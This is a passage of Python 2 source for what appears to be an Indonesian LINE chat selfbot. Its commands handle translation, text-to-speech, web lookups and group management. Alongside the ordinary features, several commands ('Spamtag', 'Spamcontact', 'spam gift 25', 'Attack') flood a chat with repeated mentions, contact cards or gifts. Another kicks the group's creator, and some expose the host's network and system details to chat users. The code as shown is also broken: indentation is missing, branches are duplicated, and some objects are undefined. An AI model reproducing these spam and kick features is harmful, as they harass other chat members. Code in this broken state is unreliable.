url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudio(msg.to,'tts.mp3')
elif 'Youtubemp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtubemp4 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class': 'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "Youtubesearch " in msg.text:
query = msg.text.replace("Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
hasil = ""
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n'))
cl.sendText(msg.to,hasil)
print '[Command] Youtube Search'
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Wikipedia " in msg.text:
try:
wiki = msg.text.lower().replace("Wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Profileig " in msg.text:
try:
instagram = msg.text.replace("Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): blan = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#==============================================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif "Restart" in msg.text:
print "[Command]Restart"
try:
cl.sendText(msg.to,"Restarting...")
cl.sendText(msg.to,"Restart Success")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif "Turn off" in msg.text:
try:
import sys
sys.exit()
except:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot has been active "+waktu(eltime)
cl.sendText(msg.to,van)
#================================ PUY SCRIPT STARTED ==============================================#
elif "google " in msg.text:
a = msg.text.replace("google ","")
b = urllib.quote(a)
cl.sendText(msg.to,"Sedang Mencari om...")
cl.sendText(msg.to, "https://www.google.com/" + b)
cl.sendText(msg.to,"Ketemu om ^")
elif cms(msg.text,["/creator","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"}
cl.sendMessage(msg)
elif "friendpp: " in msg.text:
if msg.from_ in admin:
suf = msg.text.replace('friendpp: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == suf:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = cl.getAllContactIds()
kontak = cl.getContacts(gruplist)
num=1
msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
print "Spamtag Berhasil."
elif "Spamcontact @" in msg.text:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendText(msg.to, "Done")
print " Spammed !"
elif "playstore " in msg.text.lower():
tob = msg.text.lower().replace("playstore ","")
cl.sendText(msg.to,"Sedang Mencari om...")
cl.sendText(msg.to,"Title : "+tob+"\nSource : Google Play\nLinknya : https://play.google.com/store/search?q=" + tob)
cl.sendText(msg.to,"Ketemu om ^")
elif 'wikipedia ' in msg.text.lower():
try:
wiki = msg.text.lower().replace("wikipedia ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=3)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Teks nya kepanjangan! ketik link dibawah aja\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "say " in msg.text.lower():
say = msg.text.lower().replace("say ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["spam gift 25"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text in ["Gcreator:inv"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif msg.text in ["Gcreator:kick"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.kickoutFromGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
elif 'lirik ' in msg.text.lower():
try:
songname = msg.text.lower().replace('lirik ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "Getcover @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "idline: " in msg.text:
msgg = msg.text.replace('idline: ','')
conn = cl.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
cl.sendMessage(msg)
elif "reinvite" in msg.text.split():
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
try:
grCans = [contact.mid for contact in group.invitee]
cl.findAndAddContactByMid(msg.to, grCans)
cl.cancelGroupInvitation(msg.to, grCans)
cl.inviteIntoGroup(msg.to, grCans)
except Exception as error:
print error
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No Invited")
else:
cl.sendText(msg.to,"Error")
else:
pass
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
elif msg.text in ["Restart"]:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
elif msg.text in ["time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): blan = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
client.sendText(msg.to, rst)
elif "image " in msg.text:
search = msg.text.replace("image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "**INSTAGRAM INFO USER**\n"
details = "\n**INSTAGRAM INFO USER**"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif msg.text in ["Attack"]:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
cl.sendMessage(msg)
